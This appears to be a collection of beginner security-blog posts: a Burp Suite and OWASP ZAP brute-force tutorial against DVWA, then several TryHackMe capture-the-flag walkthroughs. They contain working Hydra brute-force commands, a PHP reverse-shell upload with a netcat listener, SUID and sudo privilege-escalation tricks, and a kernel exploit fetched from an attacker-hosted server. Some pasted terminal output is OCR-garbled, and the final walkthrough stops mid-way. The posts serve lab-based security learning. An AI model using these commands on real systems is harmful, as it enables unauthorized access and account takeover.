Featured

Brute Force using Burp Suite and OWASP ZAP

Hello friends .. Are you a beginner to Cyber Security? Are you passionate about cyber security? If you are interested to learn how to Brute Force web site login page using tools like Burp suite and OWAP ZAP, then you are on the right page and this article is exactly for you. let’s learn together.

What is Brute Force Attack?

Brute Force is a simplest method where an attacker can gain access in to victims login page, or a server by guessing correct username and password by calculating all combination of usernames and passwords. For example, let’s say you have a pad locked with 3 digit combination pin, when you forget the 3 digit pin, you will try to identify the correct combination of numbers till you unlock the padlock.

When password complexity increases, with the aid of sophisticated tools, word list and dictionaries snd so on.. attacker would automate the process of brute force the web sites to gain access. This may take days, weeks but finally attacker would find a way to get into the victims account.. Perhaps, this is the only reason now days many security researchers, big companies and regulatory bodies enforcing the importance of having strong passwords and two factor authentication(2FA) such as code received via email, OTP, or even a finger print for authentication.

What is Word list or Dictionary?

Word list or Dictionary is a collection of potential passwords, commonly used for Brute force attacks. Brute force attack with dictionary or word list sometimes referred as Dictionary attack. It was observed that, attacker commonly publishes the Dictionary file after attack in the internet so that it can be used by other attackers in future.

One of the popular word list built by Kali Linux is called “rockyou”. which are located in the /usr/share/wordlists directory. Beside, you can generate your own word list generating tools. For more info refer the link shown below. https://github.com/topics/wordlist-generator

What is Burp Suite ?

Burp Suite is a Web Application Security testing collection of tools developed by PortSiwgger Web Security. It’s great tool which allows you to intercept the traffic between the client and server communication. It comes with a free, pro and enterprise edition. Although community edition is free, its recommended to use the Pro due to few additional features like Burp scanner.

For demo purpose, we use community edition.

How to Set Up Burp suite?

  • Download the Burp Suite installer for your required platform (Windows, MacOS, or Linux) from the PortSwigger.net website.
  • Follow the set up instruction by clicking the next button
  • When the installation is done click the finish button
  • When you start the Burp suite, you will have only option to use temporary project, and click next, use Burp suite defaults as shown in the installation wizard, then click startup.

Configure Burp Suite Proxy Setting

In the top, click on the “proxy tab” then select “options” and make sure the port no is 8080.

Configure the Web browser – Firefox

In the Firefox, go to menu click on the “option”.

In the search , type “Proxy Settings”, select the settings

Select the manual proxy configuration, by default “HTTP proxy” set to IP address 127.0.0.1 and “Port No” 8080.

Delete if anything appears in the “No proxy ” field

Installing Burp’s CA certificate in Firefox

By default, when you browse an HTTPS website via Burp, the Proxy generates a TLS certificate for each host, signed by its own Certificate Authority (CA) certificate. This CA certificate is generated the first time Burp is run, and stored locally. To use Burp Proxy most effectively with HTTPS websites, you will need to install Burp’s CA certificate as a trusted root in your browser.

As a first step, export CA certificate from the Burp Suite

Select Certificate in DER format and click next

Save the certificate in “.cer” format anywhere locally in the machine. Remember the path as we need to import the “burp.cer” in the browser

Now go to Firefox, select option

In the Search option, search for “certificate”

Click to view certificates

In the certificate manager, select authorities, click to import the certificate

Select the certificate from the location where you have saved earlier

When you import the certificate, check the box “Trust this CA to identify web sites”, and click “OK”

Now you have imported the certificate. Now close all dialog box and restart Firefox.Now you should be able to visit the any HTTPS URL without any errors.

What is OWASP Zed Attack Proxy?

OWASP ZAP is a open source web application security tool widely used by beginners, developers and pen testers. ZAP project is considered as one the flagship project which is actively maintained group of security researchers across the world.  It proxies HTTP traffic and allows to inspect, modify and resend them to test for security vulnerabilities. ZAP has many other features, like Passive Scanner, Fuzzer spidering web applications and performing automated scans, plus many more

How to Set Up ZAP?

  • First download the ZAP from here https://www.zaproxy.org/download/. Choose appropriate version based on your OS.
  • Execute the installer.Note that ZAP requires Java 8+ in order to run. you must install Java 8+ separately for Windows, Linux, and Cross-Platform versions
  • Once the installation is complete, launch ZAP and read the license terms. Click Agree if you accept the terms, and ZAP will finish installing, then ZAP will automatically start.

Configure ZAP Proxy Setting

When you first start ZAP, you will be asked if you want to persist the ZAP session. By default,ZAP sessions are always recorded to disk in a HSQLDB database with a default name and location. If you do not persist the session, those files are deleted when you exit ZAP.For now, select No, I do not want to persist this session at this moment in time, then click Start. The ZAP sessions will not be persisted for now

Go to “Tools” and Select “Options”

Select local proxies, verify that your address set to localhost or 127.0.0.1 and the port no to 8082.When you configure browser, you need to assign same port number

Configure the Proxy Setting in Web browser- Firefox

Go to “Option” in the Firefox and click

In the Search option, type “proxy”

Select the manual proxy configuration, by default “HTTP proxy” set to IP address 127.0.0.1 and “Port No” 8080. Port No should match with Port Number in the ZAP proxy setting. Here ZAP proxy port number is 8082.

Delete if anything appears in the “No proxy ” field

Installing ZAP’s CA certificate in Firefox

As a first step, export CA certificate from the ZAP

Select Dynamic SSL certificate. Click “generate” new certificate and

When you save the certificate in “.cer” format anywhere locally in the machine. Remember the path as we need to import the “owasp_zap_root_ca.cer” in the browser

Go to option in the Firefox

Click the option and search for “certificate”

Click the certificate to import the certificate

In the certificate manager, select authorities, click to import the certificate

Import the certificate from the location.

Open the certificate and enable the “Trust this CA to identify the websites”, then click OK

Now you have imported the certificate. Now close all dialog box and restart Firefox.Now you should be able to visit the any HTTPS URL without any errors

Brute Force Attack Using Burp Suite

Now its time to brute force Web Application using the Burp Suite and OWASP ZAP. Brute force only authorized web application.First of all,never ever run these tools against any live application or machines without permission. However, for testing purpose you can use application like DVWA,bWAP etc.

Today our target machine is DVWA. Damn Vulnerable Web Application- (DVWA) is a vulnerable application meant for security professionals to test their skills and tools in a legal environment.

How to install DVWA – read from here https://github.com/ethicalhack3r/DVWA.

Now open DVWA and log into it using its default username and password. Once you log in, click on Brute Force. And also make sure that security is low or medium.

When you click on brute force, it will ask you the username and password for login.Now suppose you don’t know the password for login into an account. ???

Before login, make sure, in the Burp Suite, “Intercept” tab, “Intercept is on”. To make brute force attack ,enter the random password and click login.

In Burp Suite the request has been intercepted.

Now send the intercepted request to the intruder, by right clicking or clicking the action button

Now go to payload tab,clear the pre-set payload positions by using the “Clear” button on the right of the request editor.Add the “password” parameter values as positions by highlighting them and using the “Add” button.

In drop down menu,select “Attack type” is “Sniper” . If there is single payload , the attack type should be “Sniper”.if there are more than one payload, then the attack type must be “Cluster Bomb”.

Now got to payload tab,select’1′ from the payload set and payload type set to “simple list”. In the payload option, settings enter some possible passwords. You can do this manually or use a custom or pre-set payload list. Click the “Start attack” button.

In the “Intruder attack”, you can sort out the results based on the column header. Here its length and Status. Also you can verify the response. Now you got the password and you can try the password in DVWA application.

In order to confirm the brute force attack has been successful, use the gathered “password” on the DVWA login page.

Username & Password Brute Force Using Burp Suite Cluster Bomb Attack

In the above scenario, we saw how burp suite guess the password for a know user name using sniper attack. Whereas if you don’t know user name and password, burp suite has another option, that’s called Cluster Bomb attack. Using this option, you can brute force the username and password.Let’s see how?

Enter the random username and password in the DVWA login page.

Intercept the request using the Burp suite and send it to “Intruder” by clicking the action button.

Now go to Intruder and payload tab,clear the pre-set payload positions by using the “Clear” button on the right of the request editor.Add the “username” and “password”parameter values as positions by highlighting them and using the “Add” button.

In drop down menu,select “Attack type” is “Cluster bomb”

Now got to payload tab,select’1′ from the payload set and payload type set to “simple list”. In the payload option, enter some possible usernames.Similarly select’2′ from the payload set and payload type set to “simple list”. In the payload option, enter some possible usernames.You can do this manually or use a custom or pre-set payload list. Click the “Start attack” button.

In the “Intruder attack”, you can sort out the results based on the column header. Here its length and Status. Also you can verify the response. Now you got the username and password and you can verify it in DVWA application.

In order to confirm the brute force attack has been successful, use the gathered “username and “password” on the DVWA login page.

Brute force attack using OWASP ZAP

Before doing the brute force attack, make sure proxy setting are correct. Unlike Burp suite, by default ZAP intercept all the traffic.when you successfully connect to the application from browser, you can see ore lines in the sites and history.

To make brute force attack ,enter the random password and click login.

See the intercepted request in the ZAP

Click “New Fuzzer” to add payloads by selecting the URL in “Sites”

Add the “username” parameter values as positions by highlighting them and using the “Add” button.

After position the parameter, you can add payloads by clicking the add button

Here,enter the possible usernames and select strings. if you are using the word list select the respective “type”. in the drop down menu. Click add to got next step.

Similarly select the position of password and set the parameter value for 2nd set of payloads. enter possible passwords and select type “string” from the drop down menu. click add to proceed to next step.

Now you have configured the payloads for username and password. Now its time to click “Start Fuzzer”.

From the “Fuzzer” window, you can sort out the results based on the column header. Here its Size Resp Body, RTT and Reason . Also you can verify comparing the responses. Now you got the username and password and you can verify it in DVWA application.

In order to confirm the brute force attack has been successful, use the gathered “username and “password” on the DVWA login page

Congratulations!Finally you’ve made a step forward towards brute forcing web application using the OWASP ZAP and Burp Suite.For security career, bug bounty programs, one should be well versed with both Burp Suite and OWASP ZAP. I prefer ZAP over Burp suite because when I do brute force with wordlist, Fuzzer in ZAP is ultra fast compared to Cluster Bomb in Burp suite.

Happy Learning!

Mr. Robot -TryHackMe

Dear Hacker friends, hope you are doing well. Welcome to Mr. Robot CTF challenge. In this challenge, we have to find 3 keys in the box. To access this box, please visit https://tryhackme.com/room/mrrobot

#Enumeration

Let’s begin with Nmap scanning to service and ports with the following command

nmap -A <IP Address>

As a result of scanning we can see common services are running in the respective ports ssh(22), http(80) and https(443)

Target machine has web server running let’s what is available on port 80

Website gives few options but which are all references to the TV show Mr. Robot.

let’s do gobuster scan to find more paths in the web directory.

The result highlighted in red color are worth checking. Let’s check one by one.

Website is hosted on WordPress which we know is vulnerable to lot of attacks. We can also run WPScan to check for more options to exploit.

There is a robot.txt file:

Robot.txt reveals some dictionary files, lets check the path

I found a file fsociety.dic and I downloaded this file onto my local machine. Similarly I’ve checked the key-1-of-3.txt. We’ve got our first key for our first challenge.

We’ve got a WP login page and dictionary file. Now we can perform brute force but before doing brute force we need to sort out the dictionary file as its size is very large with duplicate entries

After running sort command the file size has been reduced to 11451 lines.

Let’s brute force username against WP-login with Hydra. This is the Hydra command

"hydra -vV -L new.dic -p test IP Address http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'"

We’ve identified “elliot”as a username.

Similarly let’s attempt for a password with this username. This is the command

hydra -vV -P new.dic -l elliot IP address http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=The password'

Here we go..We have credentials. Now we can exploit this, aiming for some kind of reverse shell. Easy method is uploading PHP reverse shell file.

#Exploitation

If you are using Kali Linux by default web shell is available in the following directory /usr/share/webshells

Copy a php reverse shell to your current director, the command is 

"cp /usr/share/webshells/php/php-reverse-shell.php"

Assign the IP address and Port No to get the reverse shell.

I’ve uploaded the php file in the editor under Appearance. Also started the netcat listener on port 4444

After uploading the the PHP reverse shell, I’ve got the reverse shell on port no 4444, signed in as daemon

I’ve moved to the /home directory to see who is on the system. There is a user called robot with a couple of files. I’ve tried to open the text file “key-2-of-3.txt” file but I was unable to see the contents of the key file but I was able to see what was inside “password.raw-md5

When I googled the password.raw-md5,it revealed the password. Now let us try to used password to get access privilege of another user. Now we have limited user shell, let’s use python tty shell.

WoW, we ‘ve got the access as user robot. first we’ve switched to user robot, then we’ve used the password, we’ve got user robot access. We’ve read the txt file “key-2-of-3.txt” and we have got the second key.

#Privilege Escalation

In order to gain root access, we need to escalate the privilege from the current user to root user.. then only we will be able to access the root flag or 3rd key.

Let’s check the SUID permission for files. This is one of the way to run command as another user using any services running on the linux machine.

Command to check all the SUID binaries on the system:

"find / -user root -perm -4000 -print 2>/dev/null"

We can identify NMAP as a non-native SUID.let’s get an interactive NMAP shell with the following command: nmap –interactive. To elevate privilege run !sh.

Next step is to find the root flag. I’ve switched present working directory to root directory using cd command. Using ls command listed all the files. Using cat command read the flag.

Conclusion

We’ve successfully completed the Robot CTF challenge. I believe you have enjoyed the walk through. If you like it please share it on twitter, reddit or in linkedin.

Agent Sudo CTF Challenge

Dear Hacker friends! Today we are going to take a walk-through inside a TryHackMe room called “Agent Sudo”.The room is listed as an easy room, and covers a lot of different tools and aspects of security, which makes it a great room to complete for beginners.

First things first! Hope you deploy your machine and connect to the TryHackMe VPN.

So let’s begin,

#Enumeration

Let’s enumerate the machine and get all the important information using Nmap.

This machine has 3 OPEN ports.

Since port 80 is open, let us visit the web page. I looked at source code, didn’t find anything.

From the web page we’ve got a clue that we can access the hidden page by changing our User-Agent.

In order to change the agent code and see the response, let us start Burp suite. So i opened Burp Suite and intercept the request. If you look closely every Agent’s name is a single letter In the image above, I’ve already changed User-Agent to B, and tried to send it to the server. Nothing came back. So I set the intercept ON on Burp Suite and sent the request to Intruder. Changed the User-Agent section to a single letter, as the letter we get from the Agent R

There, we set our target , and specify what position we want to change, by enclosing the section in ‘§§’

We then head to the payload tab, and specify a wordlist – which in our case is just a list of each letter. Then we hit Start Attack:

On every request, we get Status 200, but on User-Agent: C we get Status 302 (Redirect):

As we can see, the response redirects us to “agent_C_attention.php”. Let us visit that web page! From there, we see the following message:

#Hash cracking and brute-force

Since we now have a username, and know that our user has a weak password, we can try and brute-force the login! Let us brute force the FTP password, and we will try using Hydra and rockyou.txt

After some time, hydra returns with an answer:
Username: chris
Password: crystal

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.94.89 ftp

Let us log into the FTP server and see what content does it have:

We see 3 files – let us download them to our machine, using the following commands:

We can use cat/nano command to see the content, we got this message.

Next two files are image files, The first thing comes in mind was running steghide and exiftools on them. However, this gave me nothing really. I tried running strings on them, and cutie.png seemed like it had some txt file hidden in it. I decided to use binwalk on it – a tool for finding embedded files and executable in images.

This showed, that some Zip file was hidden in the image:

This gave us a zip file, 8702.zip, which was password protected. Using John, this was crackable:

We use zip2john 8702.zip > output.txt to make the zip file a readable file for john and we go for the hash with john.

  • zip2john 8702.zip > output.txt.
  • john output.txt.

Ok now since I found the zip password “alien” . Now I can unzip it and view the To_agentR.txt file

‘QXJlYTUx’ looks like a base64 string let’s try to decode it.

Now, let us try and use steghide on the other image with our our newly found password for extraction:

 I’ve tried to view the content of the extracted hidden files “message.txt” using the “cat” command.

In this message, we find the name of the other Agent, james! We also find his password, hackerrules!

#Capture the user flag

Now we’ve the username and password, let’s try SSH, the command is “ssh james@IP”

When we logged in to the system we find the user flag in our current directory.

There was an image “Alien_autospy.jpg”. I downloaded the image to my machine with scp.

Doing a google image search, finding the name was simple: “Roswell Alien Autopsy”

#Privilege escalation

I tried viewing are there are any programs that I could be able to run as some other user without providing their passwords using “sudo -l”

It looks like we can run /bin/bash as any user except the user root. I did a quick google search and found that Security Bypass vulnerability in the sudo versions < 1.8.28

Any user id that is equal to 0 is considered as a root user (Symbolic form of representing root => #). So the way I think of “#-1” is like 0 – 1 = 0, machine consider -1 as a root user.

Now we’ve got accesses as root user, let’s list out content in the current directory using the “ls” command and we find only user flag. In order find the root flag we switched our directory to root directory and we got the flag. Using the cat command we found the root flag, Hooray!

Conclusion

I believe, you have enjoyed this room. We’ve learned a lot of different tools and have gained a better understanding of them. All in all, I believe this room is a great room for beginners. I would like to thank TryHackMe for making this box free (without being subscribed) and the author of the box DesKel.

Pickle Rick -CTF Challenge @TryHackMe

Dear Hackers! Good to see you again. Another day another challenge! Today we are going to walk through another simple CTF challenge. Click HERE to be redirected to the challenge.

Deploy the machine, and lets start with our initial Nmap scanning.

Port Scanning

The Nmap scan says there are HTTP, SSH services running on port number 80 and 22.

Let’s move ahead to the website running on port 80.

We’ve got a web page with a message from Rick to Morty requesting help. He needs to find the three ingredients(our flags) and other than that, there is no useful information

If we view the page source, there is a comment revealing us a username.

Now we’ve got username but to login we need a password. So we need to do more enumeration. I’ve used gobuster and saw the assets folder, and the robots.txt.

The assets directory had GIF, CSS, JS files which are being used in the website, nothing interesting there. Checking the robots.txt there is a single entry/word. This could be the password.

Now we have username and password , I’ve tried to connect to the server via SSH and the permission was denied. Let’s move on to Nikto for more enumeration.

Running Nikto we see that there is an login.php file which is interested. Let us try this login page in the web browser.

Now try out the login the credentials.

User Name: R1ckRul3s and Password: Wubbalubbadubdub

Vulnerable WebApp

On the front page of the app it seems like we have some provision to execute the commands. Let’s test that out to see where we are:

when I’ve executed the command “ls”, found a text file.

To view the content of the file executed the “cat ” command, we ‘ve got a response “command disabled”

So I’ve used “less” command instead of cat I’ve got our first flag i.e. “mr.meeseek hair “

When we executed the “less” against “clue.txt” we’ve got a clue for second ingredients

For the second flag I’ve used “less /home/rick/’second ingredients’

We’ve got the second flag “1 jerry tear”. Now we’ve to find the third flag. Let’s see the sudo permission for this particular user by executing the command “sudo -l” and and we can see that there is no restrictions and the existing user can run commands as sudo.

We see that we can execute ANY command on this box WITHOUT a password (ALL NOPASSWD: ALL). This surely is NOT good security! Let’s use the sudo command with the less with the root folder and see what we can find.

The command is: sudo less /root/3rd.txt

And we got the 3rd and final ingredient: fleeb juice

Conclusion

We’ve successfully completed the Pickle Rick -CTF Challenge.I would like to thank TryHackMe for hosting such an amazing CTF challenge. Keep it up! Once again, hope you enjoyed the walk through. See you soon, till then happy hacking!

Fowsniff CTF- Walkthrough

Introduction

Dear Hackers! Today I am going to walk through another boot2root challenge know as Fowsniff. This boot2root machine is brilliant for new starters. You will have to enumerate this machine by finding open ports, do some online research (its amazing how much information Google can find for you), decoding hashes, brute forcing a pop3 login and much more.

You can access this machine from this url: https://tryhackme.com/room/ctf

#Scanning

Let’s get things started with an nmap scan to discover open ports and services.

The nmap output shows us that there are 4 ports open 22(SSH), 80(HTTP), 110(POP3), 143(IMAP).

We find that HTTP service is running on port 80, so let us search for web server.

I didn’t find any useful information on the web page. I’ve used gobuster , but didn’t find anything.

So i’ve googled the “fowsniff corp” and found a password leak in Pastebin link.

We’ll save these passwords to a file named: fowsniff.txt

Then run a simple sed command to extract the hashed passwords (everything after the ‘:’) into a file named hashes.txt:

The passwords are MD5 hashes. These can be easily decoded using a site such as Hashes.com – just copy and paste the hashes, complete the captcha and hit submit:

We’ve managed to crack 8 out of 9 hashed passwords.Good Job!

The user seina with password scoobydoo2 still has their account up. We can enter the pop3 server on port 110 with netcat using these pop3 commands

Lets check for any sensitive files with list and retrieve them with retr <idNumber>

retr 1 reveals a temporary password for ssh, S1ck3nBluff+secureshell. This is important because we can assume that seina has already changed it. Lets inspect the second file for a potential username.

retr 2 reveals a message from baksteen, who says they will read the message later, indicating that the temporary password should still be the one for their account.

We know that SSH is open lets try and login as bakseen using the temp password “ssh baksteen@10.10.198.32 -p22

And we have a low privilege shell. To get the root flag, we must be a root user in this machine. Let’s proceed to next step,

#Root Privilege Escalation

Our user baksteen doesn’t have sudo permissions for the machine.

uname -a reveals this kernel is 4.4.0 on Ubuntu 16.04, a very outdated machine. Searching the kernel version with searchsploit linux kernel 4.4.0 reveals this exploit from exploitdb.

Also we will have to compile this c code with gcc, there is no gcc installed on the victim so we can compile on the attacker. I’ve downloaded the exploit and compiled it with gcc output.c.

After the compilation is completed in the machine, I will transfer the exploit to victims machine using a python script simple HTTPServer. In the victim’s machine I will use wget method.

After the exploit is downloaded, i will give permission using chmod +x output.c.1 and run the exploit ./output.c.1 which spawns a root shell on the victim.

Now we’ve root shell and by changing the directory inside, we will get the flag!

Conclusion

I believe, you have enjoyed the cracking of Fowsniff CTF box and learned something new today. I would like to thank TryHackMe for making this box free (without being subscribed) and the author of the box ben.

Hack Anthem on TryHackMe

Today, we are going to solve the TryHackMe- Anthem CTF room. This is another beginner level box . We need to complete all the tasks in TryHackMe. I will be explaining you each and every step required to crack the box.

Let’s get started!

Make sure you are connected to TryHackMe VPN .

Thereafter deploy the machine in TryHackMe.

Once machine is deployed check the connection with the target machine by pinging the IP of the target machine.

Task 1: Website Analysis

First step is to start the basic Nmap scanning.

We can see, nmap identified 5 open ports on the target machine, which are Port 80, Port 135, Port 139, Port 445 & Port 3389.

From the Nmap scan we’ve got the answers for the second and third questions on TryHackMe

Let’s open the website in our browser.

Let’s check website’s “/robots.txt” directory, & we find some interesting details,including a possible password.

We’ve got the answer for fourth and fifth question on TryHackMe

We’ve searched above mentioned directories and we’ve found a login page.

Scroll down to the bottom, you will see a post “A cheers to our IT department”

We’ve searched the poem on Google, & we got the admin username

Scroll down to the bottom of webpage, you will see the domain name of the website.

We’ve got answers for the sixth and seventh questions on TryHackMe

From this page, we’ve understood the email of the HR team is JD@anthem.com. Short form of the name has been used for email. Similarly we know the admin name Solomon grundy, and the email of admin would be sg@anthem.com

We’ve got the answer for the eight questions on TryHackMe

Task 2: Spot the flags

Go to main website & then go to “We are Hiring page”. Open the source code & you will find first and second flag there.

We’ve got the answer for the first and second questions on TryHackMe.

For Third flag, click on “Jane Doe” in the “We are Hiring” Page Section.

Fourth flag is in the source code of “A Cheers to our department” Page

We’ve got all the four answers for the question on TryHackMe

Task 3: Final Stage

We’ve got the username “SG” and the password “UmbracoIsTheBest“.Now access the remote machine by RDP protocol. Enter the user name and password. The RDP command is “rdesktop -u SG <IP address>

From the Desktop, we’ve got the user flag.

Now, we need to get root.txt, but first we need to be the administrator.

As the hint says, there is a hidden file in the system, which contains admin password.The Hidden admin password is inside the C directory backups folder. You need to change permissions to access the file

We don’t have permission to read the file “restore.txt”. so we changed the permission of the file from the properties, security. We’ve assigned read permission to “Everyone”.

As a normal user we’ve opened the file, now we’ve got the administrator password.

We’ve run the power shell as a administrator and we’ve listed out the directories.

We’ve switched to Administrator’s Desktop and get the flag.

Using more command , we’ve viewed the flag.

Now we need to answer the questions on TryHackMe

Finally we’ve completed the room!

Conclusion

I believe, you have enjoyed the cracking of Simple CTF box and learned something new today. I would like to thank TryHackMe for making this box free (without being subscribed) and the author of the box Chevalier.

boot2root -CTF on TryHackME

Today. I am going to show you how to solve the boot2root- CTF challenge on TryHackMe. It is a beginner level box, we need to get the user flag and root flag.

As a first step, we need to ensure the connectivity between our machine and TryHackMe machine. Start the VPN to connect to TryHackMe network, then we deploy the machine.

Active Machine Information Title Library 10.10.184.84 Expires Add 1 hour 56m 54s

Once machine was deployed, check the connectivity by pinging the target machine.

LSI 6St gst gst LSI LSI mol 4 40 Buvd

Step:1

First step towards successful exploitation is the Reconnaissance, so we started scanning with basic Nmap tool.

rootakali: /home/kali# nmap 10.10.184.84 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-26 23:59 EDT Nmap scan report for 10.10.184.84 Host is up (0.17s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http

As we can see, nmap identified two open ports on the target machine, which are Port 22 (SSH) & Port 80 (HTTP).We cannot do anything with SSH port right now, as we do not have credentials to log in. So, we will go with HTTP port.

We’ve opened the target website on your browser.

Ing @ 10.10.184.84/# Kali Tools Kali Docs Kali Forums NetHunter This is the title of a blog post Posted on June 29th 2009 b 3 COmments Lorem ipsum dolor sit amet, consectetur adipiscing elit Proin euismod tellus eu orci imperdiet nec rutrum lacus blandit Cras enim nibh, sodales ultricies elementum vel, fermentum id tellus. Proin

Step:2

For any attack Enumeration is the key. When we do enumeration from a website, note down the following details

  1. Check the website for every bit of small data.
  2. Always check “/robots.txt” directory of a website.
  3. Check the source code.
  4. Brute-force the directories using gobuster or dirbuster
Ing @ 10.10.184.84/# Kali Tools Kali Docs Kali Forums NetHunter This is the title of a blog post Posted on June 29th 2009 b 3 COmments Lorem ipsum dolor sit amet, consectetur adipiscing elit Proin euismod tellus eu orci imperdiet nec rutrum lacus blandit Cras enim nibh, sodales ultricies elementum vel, fermentum id tellus. Proin

Did you notice? The author’s name is mentioned in the blog, Posted by “meliodas”. which means,“meliodas” is one of the users on the machine.

Step:3

Now we know username and we need a password to login, So let’s brute force SSH port with Hydra and rockyou.txt wordlist. rockyou.txt is a wordlist found in your Kali machine. You can access it in the directory, “/usr/share/wordlists/rockyou.txt”

hydra -l meliodas -P /usr/share/wordlists/rockyou. txt 10.10.184.84 ssh Hydra v9.ø (0 van Hauser/THC Please do not use in mi Litary or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-27 01 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344400 login tries —896525 tries per task [DATA] attacking [STATUS] 178.øø tries/min, 178 tries in øø:ølh. 14344225 to do i Q 16 active host: 1ø.1ø.184.84 login: met iodas password: iloveyoul 1 of 1 target successfully completed,- 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-07-27 01:18:09

You will see the password of “meliodas” pop up on your screen.

Username:“meliodas
Password: “iloveyou1

Now, let’s login into the SSH. The command is ssh meliodas@<ip_of_machine>

ssh meliodas01ø.1ø.184.84 The authentiCity Of host '10.10.184.84 (10.10.184.84)' can't be established. ECDSA key fingerprint is SHA256:sKxkgmnt79RkNN7Tn25FLAOEHcu3yi1858DSdzrX4Dc. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.184.84' (ECDSA) to the list of known hosts. meliodasölø .10.184.84 's password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.ø-159-generic x86 _ 64) https : //help.ubuntu.com * Documentation: * Management: * Support: https://landscape.canonical.com https : //ubuntu.com/advantage Last login: sat Aug 24 2019 from 192.168.15.118

We got shell access with user meliodas. Using ls command we’ve found there are two files located in the present working directory. ie, user.txt and bak.py. Using cat command got the user flag

bak.py user . txt me loaasmununcu: meliodasjubuntu : Is cat user. txt

We got the user flag, we’ve got the answer for 1st question in the TryHackMe.


Step:4

Now we need to find the root flag. Type sudo -l command & you will see the command which can be run by “meliodas” as root (sudo)

This user can run “/usr/bin/python*”  &  “/home/meliodas/bak.py” as sudo or we say root.

So, let’s see what’s inside the “bak.py” file.

No useful information. We need to change the contents inside the file to use it for our advantage. Also we cannot write this file as we do not have permission to do so. Therefore, we will delete it & create a new file with the same name.

meliodasaubuntu:-$ rm bak.py rm: remove write-protected regular file meliodasaubuntu:-$ Is ser. txt ' bak.py yes

Create a new file with this command.

Refer GTFO Bins https://gtfobins.github.io/gtfobins/python/ for ‘import os; os.system(“/bin/sh”)’

This command will spawn a new shell. Now note that, if we run the bak.py file without sudo or root privileges then this command will not give us root shell, as we ourselves are executing it. Therefore, if we type sudo and give it root privileges, then it will run as root & it will give us root shell.

We have the root privileges and switched to root directory using the command “cd”. Then using the “ls command we found a file root.txt. We’ve viewed the content using “cat” command

Here we go! we’ve got the root flag and answer for the 2nd question in TryHackMe.

Conclusion

I believe, you have enjoyed today’s box Library, boot2root machine for FIT and bsides guatemala CTF on TryHackMe and learned something new. I would like to thank TryHackMe for making this box free(without being subscribed) and the author of the box stuxnet.

Hack Lian_Yu on TryHackMe

Today I am going to take you through a beginner level room on TryHackMe. Lian_Yu room is based upon the TV serial and to crack this box requires techniques like fuzzing, Stenography and privilege escalation. So I am sure today you will be learning something new and its going to be fun.

First things first, so make sure sure you are connected to TryHackme VPN and deployed the machine.

cd Downloads su root Password : rootakali : /home/kali/Downloads# sudo openvpn WebExercise .ovpn Thu Jul 23 2020 openVPN 2.4.9 x8b_b4-pc-L1nux-gnu (ope Thu Jul 23 2020 library versions: openssc 1.1.1g 21 Apr 2e Thu Jul 23 04:43:05 2020 Outgoing Control Channel Authentication: Us Thu Jul 23 04:43:05 2020 Incoming Control Channel Authentication: Us

Active Machine Information Title Ltan Yu Address IP 10.10.166.38 Expires Add 1 hour 59m 45s

If machine is deployed, next step is to check the pinging with the TryHackMe machine to make sure it is working properly.

: .$ ping 10.10.166.38 PING 10.10 (iü.iü.iöö.3ö) 56(84) bytes 64 bytes from 10.10.166.38: icmp_seq=l ttl=63 64 bytes from 10.10.166.38: icmp_seq=2 ttl=63 64 bytes from 10.10.166.38: icmp_seq=3 ttl=63 64 bytes from 10.10.166.38: icmp_seq=4 ttl=63 of data. time=153 time=153 time=154 time=153 ms ms ms ms

Now everything is ready, Let’s start our hacking!

Step-1

First step is always to start the Nmap scanning,

“nmap -sV -Pn -v <target IP>”

nmap -sv -Pn -v 10.10.166.38 Starting Nmäp 7.80 ( https://nmap.org ) NSE: Loaded 45 scripts for scanning. 0-07-23 04:51 EDT Initiating Parallel DNS resolution of 1 host. at 04:51 Completed Parallel DNS resolution of 1 host. at 04:51, 0.01s elapsed Initiating Connect Scan at 04:51 Scanning 10.10.166.38 [1000 ports] Discovered open port Ill/tcp on 10.10.166.38 Discovered open port 22/tcp on 10.10.166.38 Discovered open port 21/tcp on 10.10.166.38 Discovered open port 80/tcp on 10.10.166.38 Completed Connect Scan at 04:51, 19.97s elapsed (1000 total ports) Initiating Service scan at 04:51 Scanning 4 services on 10.10.166.38 Completed Service scan at 04:51, 6.42s elapsed (4 services on 1 host) NSE: Script scanning 10.10.166.38. Initiating NSE at 04:51 Completed NSE at 04:51, 2.79s elapsed Initiating NSE at 04:51 Completed NSE at 04:51, 0.66s elapsed Nmap scan report for 10.10.166.38 Host is up (0.16s latency). Not shown: 996 closed ports PORT 21/tcp 22/tcp 80/tcp Ill/tcp Service STATE open open open open Info: SERVICE VERSION ftp vsftpd 3.0.2 OpenSSH 6.7p1 Debian 5*deb8u8 (protocol 2.0) ssh http Apache httpd rpcbind 2-4 (RPC #100000) OSS: cpe: nux. Inux ern

From the Nmap scanning output, we understood, there were four services running on port no 21,22,80 and port 111.

As usual, let’s explore HTTP service on the URL

